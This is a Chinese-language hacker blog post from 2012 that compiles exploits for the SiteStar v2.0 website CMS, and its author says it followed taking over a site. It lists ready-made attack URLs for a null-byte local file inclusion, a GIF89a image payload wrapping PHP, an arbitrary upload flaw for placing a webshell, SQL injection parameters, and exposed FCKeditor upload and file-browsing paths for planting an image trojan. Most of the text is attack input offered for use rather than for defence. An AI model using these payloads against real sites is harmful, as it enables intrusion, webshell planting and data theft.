前两天拿个站,系统是:建站之星 (SiteStar) v2.0,自己看了看,又综合了网上的各种漏洞,整理了一份漏洞大全,这套程序浑身都是窟窿,无语中……
记录时间:
2012-3-10 14:24:43
By: Nuclear'Atk, Url: Http://lcx.cc/
程序名称:
建站之星 (SiteStar) v2.0
建站之星 SiteStar 网站管理系统 v2.0
漏洞详情:
1、本地任意文件包含漏洞:
http://127.0.0.1/index.php?_m=/../robots.txt%00.htmlmod_product&_a=prdlist
详细:https://lcx.cc/post/2319/
问题出在:/library/content.PHP, 行:14。
利用:配合文件上传,上传图片,可以瞬间拿下。
图片:GIF89a<?php phpinfo();?>
2、在线编辑器:
http://127.0.0.1/admin/fckeditor/editor/fckeditor.html
可以上传图片、浏览文件、新建文件夹等。
3、任意文件上传漏洞:
漏洞产生在 /script/multiupload/uploadify.php 文件。
低级失误,通过构造html表单可直接上传webshell至web目录。
详细:https://lcx.cc/post/2320/
4、Sql 注入漏洞:
地址:
http://192.168.1.2/index.php?_m=mod_product&_a=prdlist&cap_id=46%Inject_Here%
http://192.168.1.2/index.php?_m=mod_product&_a=view&p_id=56%Inject_Here%
数据库类型:MySQL time based injection
参数类型:Integer
其他漏洞:
路径 {
http://127.0.0.1/admin/
http://127.0.0.1/admin/index.php
http://127.0.0.1/admin/FCKeditor/
http://127.0.0.1/admin/fckeditor/editor/fckeditor.html
}
漏洞 {
任意文件包含:http://127.0.0.1/index.php?_m=/../robots.txt%00.htmlmod_product&_a=prdlist
Sql 注入漏洞:http://127.0.0.1/index.php?_m=mod_product&_a=prdlist&cap_id=37%Inject_Here%
}
编辑器 {
编辑器:http://127.0.0.1/admin/fckeditor/editor/fckeditor.html
上传:http://127.0.0.1/admin/fckeditor/browser/browser.html?Connector=connector.php
包含:http://127.0.0.1/index.php?_m=/../index.php%00.htmlmod_product&_a=prdlist
文件浏览:http://127.0.0.1/admin/fckeditor/browser/connector.php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F
上传路径:/admin/fckeditor/browser/../../../upload/file/baidu_sylogo1.gif
可以创建 a.asp 目录,上传图片木马。
各种路径(太多了,只记了部分) {
/admin/fckeditor/browser/browser.html?Connector=connector.php
/admin/fckeditor/browser/connector.php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F
/admin/fckeditor/browser/connector.php?Command=GetFoldersAndFiles&Type=Flash&CurrentFolder=%2F
/admin/fckeditor/browser/connector.php?Command=GetFoldersAndFiles&Type=Media&CurrentFolder=%2F
}
}